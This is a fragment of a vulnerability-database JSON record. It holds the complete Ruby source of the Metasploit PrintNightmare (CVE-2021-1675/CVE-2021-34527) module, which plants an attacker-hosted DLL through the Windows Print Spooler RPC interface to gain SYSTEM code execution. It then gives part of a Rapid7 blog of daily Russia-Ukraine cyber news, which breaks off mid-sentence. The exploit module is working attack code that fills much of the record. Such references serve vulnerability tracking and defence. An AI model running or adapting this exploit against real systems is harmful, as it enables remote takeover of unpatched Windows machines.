"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005090", "href": "https://support.microsoft.com/en-us/help/5005090", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-10-29T00:47:49", "description": "The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running.\n", "cvss3": {}, "published": "2022-05-16T18:56:46", "type": "metasploit", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-24T13:16:30", "id": "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/dcerpc/cve_2021_1675_printnightmare/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\nrequire 'ruby_smb'\nrequire 'ruby_smb/error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Server::Share\n include Msf::Exploit::Retry\n include Msf::Exploit::EXE\n include Msf::Exploit::Deprecated\n\n moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'\n\n PrintSystem = RubySMB::Dcerpc::PrintSystem\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Print Spooler Remote DLL Injection',\n 'Description' => %q{\n The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.\n },\n 'Author' => [\n 'Zhiniang Peng', # vulnerability discovery / research\n 'Xuefeng Li', # vulnerability discovery / research\n 'Zhipeng Huo', # vulnerability discovery\n 'Piotr Madej', # vulnerability discovery\n 'Zhang Yunhai', # vulnerability discovery\n 'cube0x0', # PoC\n 'Spencer McIntyre', # metasploit module\n 'Christophe De La Fuente', # metasploit module co-author\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'SRVHOST' => Rex::Socket.source_address\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' => [\n [\n 'Windows', {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64, ARCH_X86 ]\n },\n ],\n ],\n 'DisclosureDate' => '2021-06-08',\n 'References' => [\n ['CVE', '2021-1675'],\n ['CVE', '2021-34527'],\n ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],\n ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],\n ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],\n ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']\n ],\n 'Notes' => {\n 'AKA' => [ 'PrintNightmare' ],\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK # the dll will be copied to the remote server\n ]\n }\n )\n )\n\n register_advanced_options(\n [\n OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])\n ]\n )\n deregister_options('AutoCheck')\n end\n\n def check\n begin\n connect(backend: :ruby_smb)\n rescue Rex::ConnectionError\n return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')\n end\n\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::LoginError\n return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')\n end\n\n begin\n dcerpc_bind_spoolss\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND\n print_error(\"The 'Print Spooler' service is disabled.\")\n end\n return Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\")\n end\n\n @target_arch = dcerpc_getarch\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43\n if @target_arch == ARCH_X64\n @environment = 'Windows x64'\n elsif @target_arch == ARCH_X86\n @environment = 'Windows NT x86'\n else\n return Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n print_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\")\n\n print_status('Enumerating the installed printer drivers...')\n drivers = enum_printer_drivers(@environment)\n @driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\"\n vprint_status(\"Using driver path: #{@driver_path}\")\n\n print_status('Retrieving the path of the printer driver directory...')\n @config_directory = get_printer_driver_directory(@environment)\n vprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil?\n\n container = driver_container(\n p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll',\n p_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\"\n )\n\n case add_printer_driver_ex(container)\n when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code\n return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')\n when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND\n return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_BAD_NET_NAME\n return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_ACCESS_DENIED\n return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')\n end\n\n Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n def run\n fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?\n fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?\n\n super\n end\n\n def setup\n if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0\n fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')\n end\n\n super\n end\n\n def start_service\n file_name << '.dll'\n self.file_contents = generate_payload_dll\n\n super\n end\n\n def primer\n dll_path = unc\n if dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/\n # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass\n # otherwise the operation will fail with ERROR_INVALID_PARAMETER\n dll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\"\n end\n vprint_status(\"Using DLL path: #{dll_path}\")\n\n filename = dll_path.rpartition('\\\\').last\n container = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path)\n\n 3.times do\n add_printer_driver_ex(container)\n end\n\n 1.upto(3) do |directory|\n container.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#{filename}\")\n break if add_printer_driver_ex(container).nil?\n end\n\n cleanup_service\n end\n\n def driver_container(**kwargs)\n PrintSystem::DriverContainer.new(\n level: 2,\n tag: 2,\n driver_info: PrintSystem::DriverInfo2.new(\n c_version: 3,\n p_name_ref_id: 0x00020000,\n p_environment_ref_id: 0x00020004,\n p_driver_path_ref_id: 0x00020008,\n p_data_file_ref_id: 0x0002000c,\n p_config_file_ref_id: 0x00020010,\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\n p_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\",\n p_environment: @environment,\n p_driver_path: @driver_path,\n **kwargs\n )\n )\n end\n\n def dcerpc_bind_spoolss\n handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss'])\n vprint_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n vprint_status(\"Bound to #{handle} ...\")\n end\n\n def enum_printer_drivers(environment)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length\n DriverInfo2.read(response.p_drivers.map(&:chr).join)\n end\n\n def get_printer_driver_directory(environment)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length\n RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')\n end\n\n def add_printer_driver_ex(container)\n flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES\n\n begin\n response = rprn_call('RpcAddPrinterDriverEx', p_name: \"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags)\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n message = \"Error #{nt_status.name} (#{nt_status.description})\"\n if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN\n # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected\n print_status('The named pipe connection was broken, reconnecting...')\n reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do\n dcerpc_bind_spoolss\n rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e\n false\n else\n true\n end\n\n unless reconnected\n vprint_status('Failed to reconnect to the named pipe.')\n return nil\n end\n\n print_status('Successfully reconnected to the named pipe.')\n retry\n else\n print_error(message)\n end\n\n return nt_status\n end\n\n error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first\n message = \"RpcAddPrinterDriverEx response #{response.error_status}\"\n message << \" #{error.name} (#{error.description})\" unless error.nil?\n vprint_status(message)\n error\n end\n\n def rprn_call(name, **kwargs)\n request = PrintSystem.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault => e\n fail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\")\n end\n\n PrintSystem.const_get(\"#{name}Response\").read(raw_response)\n end\n\n class DriverInfo2Header < BinData::Record\n endian :little\n\n uint32 :c_version\n uint32 :name_offset\n uint32 :environment_offset\n uint32 :driver_path_offset\n uint32 :data_file_offset\n uint32 :config_file_offset\n end\n\n # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030\n DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do\n def self.read(data)\n header = DriverInfo2Header.read(data)\n new(\n header,\n RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')\n )\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2022-03-16T21:28:40", "description": "![Russia-Ukraine Cybersecurity Updates](https://blog.rapid7.com/content/images/2022/03/ru-security-updates.jpg)\n\nCyberattacks are a distinct concern in the [Russia-Ukraine conflict](<https://www.rapid7.com/blog/tag/russia-ukraine-conflict/>), with the potential to impact individuals and organizations far beyond the physical frontlines. With events unfolding rapidly, we want to provide a single channel by which we can communicate to the security community the major cyber-related developments from the conflict each day.\n\nEach business day, we will update this blog at 5 pm EST with what we believe are the need-to-know updates in cybersecurity and threat intelligence relating to the Russia-Ukraine conflict. We hope this blog will make it easier for you to stay current with these events during an uncertain and quickly changing time.\n\n* * *\n\n## March 16, 2022\n\nUkrainian President Volodymyr Zelenskyy [delivered a virtual speech](<https://www.nbcnews.com/politics/congress/zelenskyy-expected-press-us-military-support-address-congress-rcna20088>) to US lawmakers on Wednesday, asking again specifically for a no-fly zone over Ukraine and for additional support. \n\nThe White House released a new [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/16/fact-sheet-on-u-s-security-assistance-for-ukraine/>) detailing an additional $800 million in security assistance to Ukraine. \n\n**Threat Intelligence Update**\n\n * ******UAC-0056 targets Ukrainian entities******\n\nSentinelOne researchers reported that UAC-0056 targeted Ukrainian entities using a malicious Python-based package, masquerading as a Ukrainian language translation software. Once installed, the fake app deployed various malware, such as Cobalt Strike, GrimPlant, and GraphSteel.\n\n_Source: [Sentinel One](<https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/>)_\n\n * ******A ****h****acker was caught routing calls to Russian troops******\n\nThe Security Service of Ukraine claimed to have arrested a hacker that helped deliver communications from within Russia to the Russian troops operating in the Ukrainian territory. The hacker also sent text messages to\n\nUkrainian security officers and civil servants, exhorting them to surrender.\n\n_Source: [The Verge](<https://www.theverge.com/2022/3/15/22979381/phone-relay-capture-russia-military-unencrypted-communications-ukraine>)_\n\n## March 15, 2022\n\nThe Ukrainian Ministry of Defense [leaked documents](<https://www.scmagazine.com/analysis/breach/in-a-first-ukraine-leaks-russian-intellectual-property-as-act-of-war>) of a Russian nuclear power plant. This may be the first-ever instance of a hack-and-leak operation to weaponize the disclosure of intellectual property to harm a nation.\n\nResearchers at INFOdocket, a subsidiary of [Library Journal](<https://en.wikipedia.org/wiki/Library_Journal>), have [created](<https://www.infodocket.com/2022/03/10/briefings-reports-and-updates-about-the-conflict-in-ukraine-from-the-congressional-research-service-european-parliament-research-service-and-uk-house-of-commons-library/>) a compendium of briefings, reports, and updates about the conflict in Ukraine from three research organizations: Congressional Research Service (CRS), European Parliament Research Service (EPRS), and the UK House of Commons Library. The resource will be updated as each of the three organizations releases relevant new content.\n\nThe Wall Street Journal [is reporting](<https://www.wsj.com/articles/russian-prosecutors-warn-western-companies-of-arrests-asset-seizures-11647206193>) that Russian prosecutors have issued warnings to Western companies in Russia, threatening to arrest corporate leaders there who criticize the government or to seize assets of companies that withdraw from the country. \n\nRussia may [default on $117 million (USD) in interest payments](<https://qz.com/2142075/sanctions-are-likely-to-force-russia-to-default-on-foreign-debt/>) on dollar-denominated bonds due to Western sanctions, the first foreign debt default by Russia since 1918.\n\nReuters is [reporting](<https://www.usnews.com/news/world/articles/2022-03-14/russian-delegation-suspends-participation-in-council-of-europe-body-ria>) that Russia's delegation to the Parliamentary Assembly of the Council of Europe (PACE) is suspending its participation and will not take part in meetings. \n\nCNN [reports](<https://www.cnn.com/europe/live-news/ukraine-russia-putin-news-03-15-22/h_3f0d63658ac5c2875ed265df00ba8b40>) that Russia has imposed sanctions against US President Joe Biden, his son, Secretary of State Antony Blinken, other US officials, and \u201cindividuals associated with them,\u201d the Russian Foreign Ministry said in a statement on Tuesday.\n\n**Threat Intelligence Update**\n\n * ******Russian ****s****tate-****s****ponsored ****c****yber ****a****ctors ****a****ccess ****n****etwork ****m****isconfigured with ****d****efault MFA ****p****rotocols******\n\nCISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. The actors then exploited a critical Windows Print Spooler vulnerability, [\u201cPrintNightmare\u201d (CVE-2021-34527)](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>), to run arbitrary code with system privileges.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured>)_\n\n * ******Fake antivirus updates used to deploy Cobalt Strike in Ukraine******\n\nUkraine's Computer Emergency Response Team is warning that threat actors are distributing fake Windows antivirus updates that install Cobalt Strike and other malware. The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download \"critical security updates,\" which come in the form of a 60 MB file named \"BitdefenderWindowsUpdatePackage.exe.\"\n\n_Source: [BleepingComputer/CERT-UA](<https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/amp/>)_\n\n * ******A ****n****ovel ****w****iper ****t****argets Ukrainian ****e****ntities******\n\nCybersecurity researchers observed the new CaddyWiper malware targeting Ukrainian organizations. Once deployed, CaddyWiper destroys and overwrites the data from any drives that are attached to the compromised system. Despite being released in close proximity to other wiping malware targeting Ukraine, such as HermeticWiper and IsaacWiper, CaddyWiper does not share any significant code similarities with them and appears to be created separately.\n\n_Source:[ Bleeping Computer](<https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/amp/>)_\n\n * ******German Federal Office for Information Security ****a****gency ****i****ssues an ****a****lert for Russian ****a****ntivirus ****s****oftware Kaspersky******\n\nThe German Federal Office for Information Security agency (BSI) issued an alert urging its citizens to replace Kaspersky antivirus software with another defense solution, due to alleged ties to the Kremlin. The agency suggested Kaspersky could be used as a tool in the cyber conflict between Russia and Ukraine.\n\n_Source:[ BSI](<https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html>)_\n\n## March 14, 2022\n\nThe EU-based NEXTA media group has [reported](<https://twitter.com/nexta_tv/status/1503393046351781892?s=20&t=1tA7lZrLVe-cZpHb9wy2LA>) that Russia is starting to block VPN services.\n\nBermuda\u2019s aviation regulator [said](<https://financialpost.com/pmn/business-pmn/bermuda-revokes-licenses-for-russian-operated-planes-over-safety-concerns>) it is suspending certification of all Russian-operated airplanes registered in the British overseas territory due to international sanctions over the war in Ukraine, in a move expected to affect more than 700 planes.\n\nThe Washington Post [reported](<https://www.washingtonpost.com/world/2022/03/12/russia-putin-google-apple-navalny/>) that Federal Security Service (FSB), Russian Federalnaya Sluzhba Bezopasnosti, agents approached Google and Apple executives with requests to remove apps created by activist groups.\n\nAmnesty International [said](<https://www.amnesty.org/en/latest/news/2022/03/russia-authorities-block-amnesty-internationals-russian-language-website/>) Russian authorities have blocked their Russian-language website. \n\n**Threat Intelligence Update**\n\n * ******Anonymous claims to hack Rosneft, German subsidiary of Russian energy******\n\nAnonymous claimed to hack the German branch of the Russian energy giant Rosneft, allegedly stealing 20 TB of data. The company systems were significantly affected by the attack, although there currently seems to be no effect on the company's energy supply.\n\n_Source:[ Security Affairs](<https://securityaffairs.co/wordpress/129052/hacktivism/anonymous-hacked-german-subsidiary-rosneft.html>)_\n\n * ******Russia blocks access to Instagram nationwide******\n\nRussia's Internet moderator Roskomnadzor decided to block Instagram access in the country, following Meta's decision to allow \"calls for violence against Russian citizens.\" The federal agency gave Instagram users 48 hours to prepare and finally completed the act on March 13. The blocking of Instagram follows the former ban of Facebook and Twitter in Russia last week.\n\n_Source:[ Cyber News](<https://cybernews.com/cyber-war/instagram-is-no-longer-accessible-in-russia/?utm_source=youtube&utm_medium=cn&utm_campaign=news_CNN_047_instagram_blocked_in_russia&utm_term=2v1_yubOBMc&utm_content=direct_article>)_\n\n## March 11, 2022\n\nPresident Biden, along with the European Union and the Group of Seven Countries, [moved](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/11/fact-sheet-united-states-european-union-and-g7-to-announce-further-economic-costs-on-russia/>) to revoke \u201cmost favored nation\u201d trade status for Russia, deny borrowing privileges at multilateral financial institutions, apply sanctions to additional Russian elites, ban export of luxury goods to Russia, and ban US import of goods from several signature sectors of Russia\u2019s economy.\n\n**Threat Intelligence Update**\n\n * **Amid difficulties with renewing certificates, Russia has created its own trusted TLS certificate authority**\n\nSigning authorities based in countries that have imposed sanctions on Russia can no longer accept payments for their services, leaving many sites with no practical means to renew expiring certificates. As a result, the Russian Ministry of Digital Development announced the availability of domestic certificates, replacing expired or revoked foreign certificates.\n\n_Source: [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>)_\n\n * ******Triolan, ****a**** major Ukrainian internet service provider****,**** was hacked \u2014 twice******\n\nTriolan, a Ukraine-based ISP with more than half a million subscribers, was reportedly hacked initially on February 24th, with a second attack hitting on March 9th. The company reported that the threat actors managed to hack into key components of the network, some of which couldn\u2019t be recovered.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/10/cyberattack-on-major-ukraine-internet-provider-causes-major-outages/?sh=768d17596573>)_\n\n## March 10, 2022\n\nBy [order of President Putin](<https://twitter.com/KevinRothrock/status/1501935395092631556?s=20&t=TvFRrQvNfQ6OL3qvFJePQg>), Russia\u2019s Economic Development Ministry has drafted a bill that would effectively nationalize assets and businesses \"abandoned\" in Russia by foreign corporations. Management of these seized assets will be entrusted to the VEB.RF state development corporation and to Russia\u2019s Deposit Insurance Agency.\n\nRussia has [effectively legalized patent theft](<http://publication.pravo.gov.ru/Document/View/0001202203070005?index=0&rangeSize=1>) from anyone affiliated with countries \u201cunfriendly\u201d to it, declaring that unauthorized use will not be compensated. The Russian news agency Tass has [further reporting](<https://tass.ru/ekonomika/13982403>) on this, as does the [Washington Post](<https://www.washingtonpost.com/business/2022/03/09/russia-allows-patent-theft/>).\n\nGoldman Sachs Group Inc [announced it was closing its operations in Russia](<https://www.reuters.com/business/finance/goldman-sachs-exit-russia-bloomberg-news-2022-03-10/>), becoming the first major Wall Street bank to exit the country following Moscow's invasion of Ukraine.\n\nUK Foreign Secretary Liz Truss [announced](<https://www.gov.uk/government/news/abramovich-and-deripaska-among-seven-oligarchs-targeted-in-estimated-15bn-sanction-hit>) a full asset freeze and travel ban on seven of Russia\u2019s wealthiest and most influential oligarchs, whose business empires, wealth, and connections are closely associated with the Kremlin.\n\nUS Vice President Kamala Harris [announced](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/10/vice-president-kamala-harris-announces-additional-u-s-funding-to-respond-to-humanitarian-needs-in-ukraine-and-eastern-europe/>) nearly $53 million in new humanitarian assistance from the United States government, through the US Agency for International Development (USAID), to support innocent civilians affected by Russia\u2019s invasion of Ukraine.\n\nThe International Atomic Energy Agency (IAEA) [provided an update](<https://www.iaea.org/newscenter/pressreleases/update-17-iaea-director-general-statement-on-situation-in-ukraine>) on the situation at the Chernobyl Nuclear Power Plant. The IAEA Director General said that the Agency is aware of reports that power has now been restored to the site and is looking for confirmation. At the same time, Ukraine informed them that today it had lost all communications with the facility. The IAEA has assured the international community that there has been \u201cno impact on essential safety systems.\u201d\n\n**Threat Intelligence Update**\n\n * **New malware variant targeting Russia named RURansom**\n\nRURansom is a malware variant that was recently discovered and appears to be targeting Russia. While it was initially suspected of being a ransomware, further analysis suggests it is actually a wiper. So far, no active non-Russian targets have been identified, likely due to the malware targeting specific entities.\n\n_Source: [TrendMicro](<https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html>)_\n\n_Available in Threat Library as: RURansom_\n\n * ******Kaspersky source code leak seems to be just a collection of publicly available HTML files******\n\nThe hacking group NB65 claimed on social networks to have leaked source code from the Russian antivirus firm Kaspersky. However, it appears that the leaked files are nothing more than a long list of HTML files and other related, publicly available web resources.\n\n_Source: [Cybernews](<https://cybernews.com/cyber-war/long-awaited-kaspersky-leak-doesnt-seem-to-be-a-leak-at-all/>)_\n\n * ******Anonymous claims to hack Roskomnadzor, a Russian federal agency******\n\nHacktivist group Anonymous claims to have breached Roskomnadzor, a Russian federal agency responsible for monitoring, controlling, and censoring Russian mass media, leaking over 360,000 (817.5 GB) files. Based on the report, the leak contains relatively recent censored documents, dated as late as March 5, and demonstrates Russia\u2019s attempts to censor media related to the conflict in Ukraine.\n\n_Source: @AnonOpsSE via [Twitter](<https://twitter.com/AnonOpsSE/status/1501944150794506256>) _\n\n## March 9, 2022\n\n**Public policy:** Citing concerns over rising cybersecurity risks related to the Russia-Ukraine conflict, the US is poised to enact new cyber incident reporting requirements. The_ _[Cyber Incident Reporting for Critical Infrastructure Act of 2022](<https://www.congress.gov/bill/117th-congress/senate-bill/3600/text?q=%7B%22search%22%3A%5B%22s+3600%22%2C%22s%22%2C%223600%22%5D%7D&r=3&s=2>):\n\n * Will require critical-infrastructure owners and operators to report cybersecurity incidents to CISA within 72 hours of determining the incident is significant enough that reporting is required;\n * Will require critical infrastructure owners and operators to report ransomware payments to CISA within 24 hours; and\n * Is intended to give federal agencies more insight into attack trends and potentially provide early warnings of major vulnerabilities or attacks in progress before they spread.\n\nThe Bank of Russia [established](<https://www.cbr.ru/eng/press/event/?id=12744>) temporary procedures for foreign cash transactions, suspending sales of foreign currencies until September 9, 2022. Foreign currency accounts are limited to withdrawals up to $10,000 USD.\n\nThe Financial Crimes Enforcement Network (FinCEN) is [alerting all financial institutions](<https://www.fincen.gov/index.php/news/news-releases/fincen-advises-increased-vigilance-potential-russian-sanctions-evasion-attempts>) to be vigilant against efforts to evade the expansive sanctions and other US-imposed restrictions implemented in connection with the Russian Federation\u2019s further invasion of Ukraine.\n\nThe Pentagon [dismissed](<https://www.cnn.com/2022/03/08/politics/poland-jets-ukraine-russia/index.html>) Poland\u2019s offer to transfer MIG-29 fighter jets to the United States for delivery to Ukraine, stating they did not believe the proposal was \u201ctenable.\u201d\n\n**Threat Intelligence Update**\n\n * ******Multiple hacking groups target Ukrainians and other European ****a****llies via ****p****hishing ****a****ttacks******\n\nSeveral threat actors, including Fancy Bear, Ghostwriter, and Mustang Panda, have launched a large phishing campaign against Ukraine, Poland, and other European entities amid Russia's invasion of Ukraine. \n\n_Source: [The Hacker News](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>)_\n\n_Available in Threat Library as: APT28 (Fancy Bear), Ghostwriter, Mustang Panda_\n\n * ******The Conti Ransomware group resumes activity following leaks******\n\nThe Conti Ransomware group appears to have made a comeback following the [leak of its internal chats last week](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>). On March 9, Rapid7 Threat Intelligence observed renewed activity on Conti\u2019s onion site, and CISA released new IOCs related to the group on their Conti alert page.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>)_\n\n_Available in Threat Library as: Conti_\n\n * ******The Belarusian group UNC1151 targets Ukrainian organizations using MicroBackdoor malware******\n\nThe Ukrainian government has reported on a continuous cyberattack on state organizations of Ukraine using malicious software Formbook.\n\n_Source: [Ukrainian CERT](<https://cert.gov.ua/article/37626>)_\n\n_Available in Threat Library as: UNC1151_\n\n## March 8, 2022\n\nThe US [announced](<https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/08/executive-order-on-use-of-project-labor-agreements-for-federal-construction-projects-2/>) a ban on imports of Russian oil, gas, and other energy products. New US investments in the Russian energy sector are also restricted. The UK [announced](<https://www.gov.uk/government/news/uk-to-phase-out-russian-oil-imports>) it would phase out Russian oil over 2022. \n\nThe International Atomic Energy Agency [published a statement](<https://www.iaea.org/newscenter/pressreleases/update-15-iaea-director-general-statement-on-situation-in-ukraine>) noting that remote data transmission from monitoring systems at Ukraine\u2019s mothballed Chernobyl nuclear power plant has been lost. No network data has been observed by internet monitoring companies since March 5, 2022.\n\nChris Chivvis, a senior fellow and director of the American Statecraft Program at the Carnegie Endowment for International Peace, has provided [an assessment](<https://carnegieendowment.org/2022/03/03/how-does-this-end-pub-86570>) of two likely trajectories in the Russia-Ukraine conflict. \n\nTwitter [announced](<https://twitter.com/AlecMuffett/status/1501282223009542151?s=20&t=tO-TNZw5ct6tZUcwyvMl4A>) they have made their social network available on the Tor Project onion service, which will enable greater privacy, integrity, trust, and availability to global users.\n\nThe Minister of Foreign Affairs of the Republic of Poland [announced](<https://www.gov.pl/web/diplomacy/statement-of-the-minister-of-foreign-affairs-of-the-republic-of-poland-in-connection-with-the-statement-by-the-us-secretary-of-state-on-providing-airplanes-to-ukraine>) they are ready to deploy \u2014 immediately and free of charge \u2014 all their MIG-29 jets to the Ramstein Air Force base and place them at the disposal of the US government.\n\nLumen [announced](<https://news.lumen.com/RussiaUkraine>) they are immediately ceasing their limited operations in Russia and will no longer provide services to local Lumen enterprise customers.\n\nMcDonald\u2019s 